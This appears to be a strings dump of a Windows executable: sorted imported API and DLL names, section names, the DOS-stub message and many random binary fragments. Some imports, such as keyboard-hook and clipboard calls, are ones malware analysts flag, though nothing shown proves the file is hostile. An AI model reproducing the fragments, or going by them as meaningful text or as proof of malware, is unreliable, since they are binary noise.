]6e:KC
&*.79c
;8,t^Y
9)5-xB
9|9$JZp
AnimatePalette
BvOU		iT
CallNextHookEx
[c!EW(
CGG9J{N
ChildWindowFromPoint
ClipCursor
CLSIDFromProgID
CLSIDFromString
CoCreateGuid
CoCreateInstance
CoFreeUnusedLibraries
CoGetClassObject
CoGetMalloc
COMCTL32.dll
comdlg32.dll
CompareStringW
CoTaskMemAlloc
CoTaskMemFree
CreateFiberEx
CreateFontIndirectA
CreateILockBytesOnHGlobal
CreatePen
CreateStreamOnHGlobal
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DrawEdge
EmptyClipboard
EnumResourceNamesW
ExtCreatePen
f7Hi]%
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
fl3Sb"
FlattenPath
FlushFileBuffers
GDI32.dll
GetBitmapBits
GetBkColor
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetHGlobalFromILockBytes
GetHGlobalFromStream
GetPath
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
hom;)~
hPd3U8h
>i4|L&
I&}5z5
I9*7i6
iHCG?r{
i@&K26>
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
ioT6x[
IsClipboardFormatAvailable
IsDBCSLeadByte
IZ:5,w
.+]]Jl8V
JRichu
j>Z`O,
k)-6{1W0
KERNEL32.dll
KHz../
kKWNlE
kuyz}U
L:0	zZ
ln5n<dj
LocalAlloc
LockFile
lrx\x5V
LSm+&/'W
MonitorFromWindow
mWd;5/
N5.;dw
[n*+6m0
NdrClientCall
(nO=aT
N=Y=9?
_o9O>=
O}Jr8|
ole32.dll
OleDuplicateData
OleGetAutoConvert
OleRegGetUserType
OleRun
PathCanonicalizeW
PathCombineW
PathIsRelativeW
PathIsRootW
PathIsURLW
PathStripToRootW
p+K=Z@
PlgBlt
pmM5 -
PolyBezier
ProgIDFromCLSID
~q!7ik
qG0<yzQ
`.rdata
RegisterClassW
RegisterDragDrop
ReleaseStgMedium
RevokeDragDrop
RoundRect
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
SearchPathW
SetClipboardData
SetCommConfig
SetDIBits
SetEndOfFile
SetScrollRange
SetStretchBltMode
SetTextColor
SetWindowPos
SetWindowsHookExW
SHLWAPI.dll
SKf?Qa
StgCreateDocfileOnILockBytes
StgOpenStorageOnILockBytes
StringFromCLSID
StrokePath
s	yVL&
!This program cannot be run in DOS mode.
tj_^M"
ToAscii
To#JU!
*u{EV7
UL)04&
UnhookWindowsHookEx
UnlockFile
USER32.dll
uX(zhOZhW
VerLanguageNameW
vhOi}5*1
V.\mo#
v\;_N]L
Vp/	t?
WinHelpW
*wkXtp
W~mz5	q
X(;_IY
YbUJ)X
'~y`iCaL
!YN/B~b
zIV+.X_<
Zk;	U_
ZN/?5Oi
ZRe?\;L
ZTU>?)